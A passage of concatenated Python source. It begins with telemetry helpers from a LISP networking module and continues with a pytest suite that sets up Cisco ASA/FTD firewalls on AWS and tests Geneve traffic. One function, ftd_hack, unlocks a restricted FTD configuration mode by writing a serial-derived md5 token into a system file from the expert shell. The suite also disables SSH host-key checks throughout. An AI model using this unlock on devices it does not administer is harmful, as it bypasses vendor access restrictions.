if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if (lisp_json_list.has_key("telemetry") == False): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#------------------------------------------------------------------------------
|
test_geneve.py
|
import os, sys
import re, hashlib, time
import atexit
from scapy.all import *
import pytest
from awsAPIv3 import aws
from lib_yijun import *
#pytest -v -s -m geneveASA --skip_updown --html=report.html --self-contained-html --metadata Version 9.17.0.20
def load_asa_config(asa_address, asa_jb_ip="20.0.250.10", debug=False):
import pexpect
# asa_address = "ssh -i 'testDog.pem' admin@3.142.241.180"
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
# conn.sendline("copy http://20.0.250.10/geneve.smp disk0:/.")
conn.sendline(f"copy http://{asa_jb_ip}/geneve.smp disk0:/.")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
conn.sendline("conf term")
conn, result, cont = Geneve_reply(conn)
conn.sendline("boot system disk0:/geneve.smp")
conn, result, cont = Geneve_reply(conn)
# if debug:
# print("~~~~~~Debug~~~~~~~")
# print('WAITED', wait(600))
# pytest.skip("Time to debug ASA error before reload")
conn.sendline("reload")
conn, result, cont = Geneve_reply(conn, debug=debug)
print('WAITED', wait(600))
conn.close();
del conn
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
conn.sendline("conf term")
conn, result, cont = Geneve_reply(conn)
# asa load pytest_day999.txt
Geneve_load(conn, "pytest_day999.txt")
conn.sendline("show run")
conn, result, cont = Geneve_reply(conn)
assert "20.0.1.101" in cont
def asa_config(asa_address, lines, debug=False) -> tuple:
import pexpect
conn = None
while not conn:
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
conn.sendline("conf term")
conn, result, cont = Geneve_reply(conn)
# for line in lines.splitlines():
# if line:
# conn.sendline(line)
# conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline(lines)
conn, result, cont = Geneve_reply(conn, debug=debug)
conn.close()
del conn
return result, cont
def ftd_hack(ftd_address, debug=False):
import pexpect
conn = None
while not conn:
conn = pexpect.spawn(ftd_address)
conn, result, cont = Ocean_reply(conn, debug=debug) #firstlogin, finish all password
go2fxos(conn, debug=debug)
conn.sendline("configure manager delete")
conn, result, cont = Ocean_reply(conn, debug=debug)
time.sleep(5)
conn.sendline("configure manager add 20.0.250.13 cisco")
conn, result, cont = Ocean_reply(conn, debug=debug)
go2ftd(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("show version")
conn, result, cont = Ocean_reply(conn, debug=debug)
p = "Serial Number: (.*)"
sn = re.compile(p).findall(cont)[0].strip()
if debug: print(sn)
go2expert(conn, debug=debug)
cli = f"sudo echo -n '1111222233334444{sn}' | md5sum>/mnt/disk0/enable_configure"
conn.sendline(cli)
conn, result, cont = Ocean_reply(conn, debug=debug)
if debug:
cli = "cat /mnt/disk0/enable_configure"
conn.sendline(cli)
conn, result, cont = Ocean_reply(conn, debug=debug)
print (cont)
go2ftd(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("")
Ocean_reply(conn, debug=debug)
conn.sendline(f"debug menu file-system 7")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("")
Ocean_reply(conn, debug=debug)
conn.sendline(f"conf term")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("")
conn, result, cont = Ocean_reply(conn, debug=debug)
if "firepower(config)#" not in cont:
print("[Error][ftd_hack] failed to hack")
return
conn.sendline(f"end")
Ocean_reply(conn, debug=debug)
def ftd_config(ftd_address, lines, debug=False) -> tuple:
import pexpect
conn = None
while not conn:
conn = pexpect.spawn(ftd_address)
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("system support diagnostic-cli")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("end")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("conf term")
conn, result, cont = Ocean_reply(conn, debug=debug)
for line in lines.splitlines():
if line:
conn.sendline(line)
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("end")
Ocean_reply(conn, debug=debug)
conn.close()
del conn
return result, cont
def load_ftd_config(ftd_address, debug=False):
import pexpect
conn = pexpect.spawn(ftd_address)
conn, result, cont = Ocean_reply(conn,debug=debug)
go2ftd(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn,debug=debug)
conn.sendline("conf term")
conn, result, cont = Ocean_reply(conn,debug=debug)
Ocean_load(conn, "pytest_day999FTD.txt",debug=debug)
conn.sendline("show run")
conn, result, cont = Ocean_reply(conn,debug=debug)
assert "20.0.1.102" in cont
@pytest.fixture(scope="module", autouse=True)
def setup(request):
skip_updown = request.config.option.skip_updown
if skip_updown:
print("\nsetup/teardown: skipped")
return
global setting, aws_obj
setting = {}
with open("/Users/yijunzhu/.aws/config_auto", "r") as f:
cfg = f.read()
with open("/Users/yijunzhu/.aws/credentials_auto", "r") as f:
cda = f.read()
setting["config"] = cfg
setting["credentials"] = cda
with open("/Users/yijunzhu/.aws/config", "r") as f:
bytes_str = f.read().encode()
md5_default_config = hashlib.md5(bytes_str).digest()
with open("/Users/yijunzhu/.aws/credentials", "r") as f:
bytes_str = f.read().encode()
md5_default_credentials = hashlib.md5(bytes_str).digest()
debug = request.config.option.trs
aws_obj = aws(setting, debug=debug)
atexit.register(aws_obj.close)
aws_obj.load_deployment(fileName="aws_tb_pytest_west_1.config")
aws_obj.start_deployment()
Basic_miss_config()
asa_ip = aws_obj.fetch_address("Test-1-169-EC2-ASA")
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
load_asa_config(asa_address, debug)
def teardown():
aws_obj.close()
with open("/Users/yijunzhu/.aws/config", "r") as f:
bytes_str = f.read().encode()
md5_default_config_v = hashlib.md5(bytes_str).digest()
with open("/Users/yijunzhu/.aws/credentials", "r") as f:
bytes_str = f.read().encode()
md5_default_credentials_v = hashlib.md5(bytes_str).digest()
assert md5_default_config == md5_default_config_v
assert md5_default_credentials == md5_default_credentials_v
request.addfinalizer(teardown)
def Basic_miss_config():
print("####Basic_miss_config test####")
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run()
cmd1 = "sudo ifconfig eth1 down"
cmd2 = "sudo ifconfig eth1 10.0.1.10/24"
cmd3 = "sudo ifconfig eth1 up"
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh2 = paramiko.SSHClient()
ssh2.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
ssh2.connect(asa_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
_, stdout, _ = ssh.exec_command(f"{cmd1};{cmd2};{cmd3}")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh2.exec_command(f"{cmd1};{cmd2};{cmd3}")
stdout.channel.recv_exit_status()
ssh.close()
ssh2.close()
#~~~~~~~~~~
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# jb_ip = aws_obj.fetch_address("Test-1-169-EC2-App-JB")
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "100% packet loss" in resp1
ssh.close()
# @pytest.fixture(scope="module", params=["mod1", "mod2"])
# def sss():
# print("~~~~~sss~~~~~")
#
# @pytest.mark.shit
# def test_shit(sss):
# print("\nshit")
#
# @pytest.mark.shit
# def test_shit2():
# print("shit2")
@pytest.mark.clusterConfig
def test_cluster_config(local_asa):
asa_dict = local_asa
print(asa_dict)
key = "testCat.pem"
asa_jb_ip = "30.0.250.20"
job_list = []
from multiprocessing import Process
timer_start = time.time()
for name, ip in asa_dict.items():
asa_address = f"ssh -i '{key}' admin@{ip}"
name = name.replace("#", "-")
timer_p = Process(target=load_asa_config_multi, args=(asa_address, name, asa_jb_ip))
timer_p.start()
job_list.append(timer_p)
for job in job_list:
job.join()
job.close()
end = time.time() - timer_start
print("Info: time cost == ", end)
#Load config
#TBD
@pytest.mark.geneveASA
@pytest.mark.basic1to2
def test_Basic_PingGoogle(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert " 0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.basic2to1
def test_Basic_PingApp(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
access_list = f"access-list geneve extended permit icmp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, access_list)
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command(f"ping {app_ip} -c 1")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert " 0% packet loss" in resp1
no_access_list = f"no access-list geneve extended permit icmp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_access_list)
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.install1to2
def test_apt_install_from_outside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install net-tools'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ifconfig'")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "10.0.1.101" in resp2
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.install2to1
def test_apt_install_from_inside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
access_list = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, access_list)
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt update'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install iperf -y'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install apache2 -y'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command(f"wget http://{app_ip}/index.html; ls index.html")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "No such file or directory" not in resp2
no_access_list = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_access_list)
ssh.close()
@pytest.mark.pyserver
def test_PYSERVER(skip_updown):
print("skip_updown:", skip_updown)
# asa_jb_address = "ssh -i 'testDog.pem' ubuntu@54.219.169.240"
# asa_address = "ssh -i 'testDog.pem' ubuntu@54.241.122.28"
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@13.57.178.96:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@13.57.178.96 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@13.52.150.43:/home/ubuntu/.'"
os.popen(cmd2).read()
cmd3 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@13.57.48.179:/home/ubuntu/."
os.popen(cmd3).read()
# 2. run server file
# cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
# "ubuntu@54.219.169.240 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
# "ubuntu@54.241.122.28 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
# os.popen(cmd3).read()
@pytest.mark.geneveASA
@pytest.mark.tcp
@pytest.mark.tcp1to2
def test_TCP23_from_outside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
no_acl_config = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.tcp
@pytest.mark.tcp2to1
def test_TCP23_from_inside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_jb_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3;python3 test.py\''"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.fixture()
def local_run(show=False):
if "aws_obj" not in globals():
aws_obj = aws(record=False)
app_jb = aws_obj.blind("Test-1-169-EC2-App-JB", "EC2INSTANCE", show=show)
asa_jb = aws_obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE", show=show)
asa = aws_obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE", show=show)
app = aws_obj.blind("Test-1-169-EC2-App", "EC2INSTANCE", show=show)
ftd = aws_obj.blind("Pytest-EC2-FTD", "EC2INSTANCE", show=show)
fmc = aws_obj.blind("Pytest-EC2-FMC", "EC2INSTANCE", show=show)
# ftd = aws_obj.blind("Pytest-EC2-FTD", "EC2INSTANCE", show=show)
# fmc = aws_obj.blind("Pytest-EC2-FMC", "EC2INSTANCE", show=show)
app_jb_ip = app_jb["public_ip"]
asa_jb_ip = asa_jb["public_ip"]
asa_ip = asa["public_ip"]
app_ip = app["public_ip"]
ftd_ip = ftd["public_ip"]
fmc_ip = fmc["public_ip"]
yield app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip
aws_obj.close()
@pytest.fixture()
def acl_config(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
yield
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.udpYijun
# def test_UDP666(acl_config):
def test_UDP666(local_run, acl_config):
# if "aws_obj" in globals():
# app_jb = aws_obj.blind("Test-1-169-EC2-App-JB", "EC2INSTANCE")
# asa_jb = aws_obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE")
# asa = aws_obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE")
# app = aws_obj.blind("Test-1-169-EC2-App", "EC2INSTANCE")
#
# else:
# aws_obj = aws(record=False)
# app_jb = aws_obj.blind("Test-1-169-EC2-App-JB", "EC2INSTANCE")
# asa_jb = aws_obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE")
# asa = aws_obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE")
# app = aws_obj.blind("Test-1-169-EC2-App", "EC2INSTANCE")
#
# app_jb_ip = app_jb["public_ip"]
# asa_jb_ip = asa_jb["public_ip"]
# asa_ip = asa["public_ip"]
# app_ip = app["public_ip"]
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
# asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
# acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
# asa_config(asa_address, acl_config)
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
# no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
# asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.udp1to2
def test_UDP_from_inside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.udp2to1
